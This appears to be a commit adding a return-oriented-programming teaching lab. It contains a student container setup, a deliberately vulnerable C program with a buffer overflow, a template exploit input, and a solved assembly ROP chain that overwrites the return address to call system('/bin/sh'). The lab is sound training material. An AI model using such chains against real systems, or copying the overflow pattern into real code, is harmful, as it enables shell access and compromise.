added ropgadget example

ropgadget01/.gitignore

@@ -0,0 +1 @@
+data/.gef-2025.01.py

ropgadget01/Containerfile

@@ -0,0 +1,21 @@
+FROM debian:bookworm-slim
+
+# prepare container
+RUN apt update && apt install -y bash vim less nasm nano gdb make gcc python3 python3-ropgadget python3-pwntools git ca-certificates curl python3-pip file inetutils-ping procps
+RUN apt-get clean && rm -rf /var/lib/apt/lists/* # minimize 
+
+RUN useradd -m -s /bin/bash student
+COPY ./welcome_screen /etc/motd
+
+# prepare student account
+USER student
+COPY --chown=student:student ./data/ /home/student
+
+RUN echo '[ ! -z "$TERM" -a -r /etc/motd ] && cat /etc/motd; export LANG=C.UTF-8' \
+    >> /home/student/.bashrc
+
+RUN echo 'source /home/student/.gef-2025.01.py' \
+    >> /home/student/.gdbinit
+
+WORKDIR /home/student
+ENTRYPOINT ["/bin/bash"]

ropgadget01/build-image.sh

@@ -0,0 +1,6 @@
+#!/bin/bash
+podman image rm ropgadget01
+
+podman image build \
+    --tag ropgadget01 \
+    --file ~/pod/Containerfile

ropgadget01/data/Makefile

@@ -0,0 +1,10 @@
+all: ropme input
+
+input:
+	nasm -f bin ./input.asm
+
+clean:
+	rm -f ropme
+
+bufoverflow:
+	gcc ropme.c -o ropme -O3 -fno-unroll-loops -fno-omit-frame-pointer -fno-dce -fno-dse

ropgadget01/data/input.asm

@@ -0,0 +1,10 @@
+bits 64
+
+global _start
+_start:
+    ; we place /bin/sh and a few zero bytes at the start (16B)
+    db '/bin/sh', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+
+    times 0x1f0 nop        ; fill buffer, i.e., 512B in total
+    
+    ; TODO: complete me from here

ropgadget01/data/input.solved.asm

@@ -0,0 +1,23 @@
+bits 64
+
+global _start
+_start:
+    ; we place /bin/sh and a few zero bytes at the start (16B)
+    db '/bin/sh', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+
+    times 0x1f0 nop        ; fill buffer, i.e., 512B in total
+
+    times 0x10 nop      ; buffer is at rbp+0x210, so skip 0x10 more
+    times 0x8 nop       ; overwrite saved rbp
+
+    dq 0x7ffff7e007e5   ; pop rdi + ret
+    ; real version
+    dq 0x7fffffffe2a0   ; ptr to buffer, which contains "/bin/sh" at the start
+    ; gdb version
+    ; dq 0x7fffffffe250   ; ptr to buffer, which contains "/bin/sh" at the start
+
+    dq 0x7ffff7e007e6   ; just ret -- this will change the stack by 8B
+    dq 0x7ffff7e25490   ; system("/bin/sh")
+    dq 0x7ffff7e007e5   ; pop rdi
+    dq 0
+    dq 0x7ffff7e17680   ; exit(0)

ropgadget01/data/input.txt

@@ -0,0 +1,71 @@
+/bin/sh
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ropgadget01/data/ropme.c

@@ -0,0 +1,23 @@
+// usage: ropme <input-filename>
+//
+// Goal: invoke /bin/bash using ROP
+//
+// files with more than 512B content will cause overflows.
+// smaller files work just fine.
+
+#include <stdint.h>
+#include <string.h>
+#include <stdio.h>
+
+int mystr(char *fn) {
+    char mystr[512];
+    *(uint64_t *) mystr = 0; // zero first 8 bytes
+    register FILE *f = fopen(fn, "rb");
+    fread(mystr, 1024, 1, f); // VULNERABLE! reading 1024B into 512B buf
+    return mystr[0];
+}
+
+int main(int argc, char *argv[]) {
+    if (argc != 2) { printf("too few args."); return 1; }
+    return mystr(argv[1]);
+}

ropgadget01/exec_pod.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+
+# Create a unique container name for each session
+
+# Run a container in interactive mode, delete it on exit
+exec podman run --rm -it \
+  --hostname "lab" \
+  --cap-add=SYS_PTRACE --security-opt seccomp=unconfined \
+  --memory="512m" --cpus="1.0" \
+  ropgadget01
+  #--network none \

ropgadget01/welcome_screen

@@ -0,0 +1,13 @@
+/**********************************************************************/
+ 				ROP GADGET LAB
+
+ USAGE EXAMPLES:
+  ldd /bin/bash 		# see linked libraries
+  ROPgadget --help		# see ROPgadget help
+  # search all gadgets in libc
+  ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6
+
+ IMPORTANT: THESE EXAMPLES ASSUME ASLR IS DISABLED. FOR PWNING, YOU
+            SHOULD RUN ALL PROGRAMS PREFIXED WITH `setarch `uname -m` -R`
+
+/**********************************************************************/